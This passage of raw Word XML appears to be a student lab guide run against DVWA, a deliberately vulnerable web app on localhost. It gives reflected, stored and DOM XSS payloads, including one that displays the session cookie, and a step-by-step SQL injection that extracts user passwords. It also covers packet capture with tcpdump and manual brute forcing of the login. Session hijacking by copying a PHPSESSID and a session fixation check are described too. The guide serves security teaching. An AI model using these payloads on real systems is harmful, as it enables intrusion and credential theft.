        <w:t>sudo apt install dvwa -y</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>sudo service apache2 start</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>sudo service mysql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2217ECC1" w14:textId="74D1D102" w:rsidR="00BF38EA" w:rsidRDefault="00BF38EA" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo dvwa-start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34560D72" w14:textId="77777777" w:rsidR="00781094" w:rsidRDefault="000B64B0" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00826CB2">
        <w:t>docker run --rm -it -p 80:80 vulnerables/web-dvwa</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Login:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:lastRenderedPageBreak/>
        <w:t>Username: admin</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Password: password</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Go to DVWA Security → Set level to LOW → Submit.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Go to: DVWA → XSS (Reflected)</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>In input box type:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Click Submit.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Popup alert appears → Reflected XSS confirmed.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Go to: DVWA → XSS (Stored)</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Enter:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Name: Hacked</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Message:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Click Sign Guestbook.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Refresh page.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Popup appears every time page loads → Stored XSS confirmed.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Go to: DVWA → XSS (DOM)</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>In browser URL add:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>#&lt;script&gt;alert('DOM XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Press Enter.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Popup appears → DOM XSS confirmed.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6694" w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03835BE7" w14:textId="28EAD953" w:rsidR="00AF6694" w:rsidRDefault="00AF6694" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6694">
        <w:t>In Stored XSS message box type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Session cookie is displayed (shows how attackers steal sessions).</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Go to DVWA Security.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Set level to:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>• Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>• High</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Repeat same tests.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
        <w:t>Some payloads will be blocked due to filtering.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6694">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F991C" w14:textId="530B33BD" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="16519699">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DD5FD" w14:textId="1E837576" w:rsidR="00AE4FCB" w:rsidRPr="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AF6694">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4FCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Packet Sniffing and Network Traffic Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4FCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F632A" w14:textId="77777777" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C7222" w14:textId="77777777" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo tcpdump -i any -w capture.pcap port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921EE3F" w14:textId="77777777" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Open Firefox and visit http://localhost:8080 then refresh the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA6575" w14:textId="77777777" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Press Ctrl + C in tcpdump terminal to stop capturing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183363E" w14:textId="77777777" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Open File Manager and find capture.pcap in the Home folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF79AF" w14:textId="77777777" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Double-click capture.pcap to open it in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D982906" w14:textId="68764B71" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Type http.request.method == "</w:t>
      </w:r>
      <w:r w:rsidR="00BE253B">
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>" in Wireshark filter bar and press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A5FD5A" w14:textId="617AF655" w:rsidR="00AE4FCB" w:rsidRDefault="00AE4FCB" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Click a packet to view browser details, URLs, and any plain text data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584CC56" w14:textId="17CDFE05" w:rsidR="00D87CD5" w:rsidRDefault="00D87CD5" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="129FCED2">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D929444" w14:textId="4747F9F6" w:rsidR="00D87CD5" w:rsidRPr="00C40170" w:rsidRDefault="00D87CD5" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40170">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Injection Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40170">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125755F5" w14:textId="261C6225" w:rsidR="00BC6B4B" w:rsidRDefault="00BC6B4B" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC6B4B">
        <w:t># Step 1: Update System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>sudo apt update</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 2: Install DVWA (if not installed)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>sudo apt install dvwa -y</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 3: Start Required Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>sudo service apache2 start</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>sudo service mysql start</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 4: Configure DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>sudo nano /etc/dvwa/config.inc.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Ensure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>$_DVWA['db_password'] = '';</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Save and Exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 5: Open DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>Open Firefox → http://127.0.0.1/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Login: admin / password</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Click "Create / Reset Database"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 6: Set Security Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>DVWA Security → Set to Low → Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 7: Open SQL Injection Page</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>DVWA → Vulnerabilities → SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 8: Normal Input Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>Enter: 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Shows single user details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 9: Authentication Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Enter:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' OR '1'='1' -- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># All user records displayed</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 10: Find Number of Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' ORDER BY 1-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' ORDER BY 2-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' ORDER BY 3-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Stop when error occurs</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 11: Test UNION Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' UNION SELECT 1,2-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 12: Extract Database Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' UNION SELECT database(),2-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 13: Extract Table Names</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=database()-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 14: Extract Column Names</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t># Step 15: Extract Username &amp; Password</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B4B">
        <w:br/>
        <w:t>1' UNION SELECT user,password FROM users-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521694C7" w14:textId="5C128343" w:rsidR="004F4B26" w:rsidRDefault="004F4B26" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="47567D52">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B933D" w14:textId="582D17A4" w:rsidR="004F4B26" w:rsidRPr="004F4B26" w:rsidRDefault="004F4B26" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4B26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Testing Authentication Weaknesses and Session Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E420EE" w14:textId="18CF29F6" w:rsidR="004F4B26" w:rsidRDefault="004F4B26" w:rsidP="00AE4FCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004F4B26">
        <w:t># PART A: Start DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 1: Start Services</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>sudo service apache2 start</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>sudo service mysql start</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 2: Open DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Open Firefox → http://127.0.0.1/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Login: admin / password</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 3: Set Security Level</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>DVWA Security → Set to LOW → Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>=========================================</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>PART B: AUTHENTICATION WEAKNESS</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>=========================================</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 4: Open Brute Force Module</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>DVWA → Vulnerabilities → Brute Force</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 5: Try Common Password</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Username: admin</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:lastRenderedPageBreak/>
        <w:t>Password: password</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Login successful → Weak password</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 6: Manual Brute Force</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Try passwords one by one:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># No account lock → Unlimited attempts allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Brute force vulnerability confirmed</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>=========================================</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>PART C: SESSION MANAGEMENT TESTING</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>=========================================</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 7: View Session ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Login to DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Right Click → Inspect → Storage → Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Find: PHPSESSID</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Session ID visible</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>SESSION HIJACKING</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 8: Copy Session ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Copy PHPSESSID value from logged-in browser</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 9: Open Private Window</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Ctrl + Shift + P</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Open http://127.0.0.1/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 10: Replace Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Inspect → Storage → Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Replace PHPSESSID with copied value</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Refresh page</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Logged in without password → Session hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>SESSION FIXATION</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 11: Check Session Before Login</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Open DVWA login page</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Inspect → Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Note PHPSESSID</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># Step 12: Login in Same Window</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Login: admin / password</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>Check PHPSESSID again</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t># If same value → Session fixation exists</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
        <w:br/>
        <w:t>IMPROPER LOGOUT TEST</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4B26">
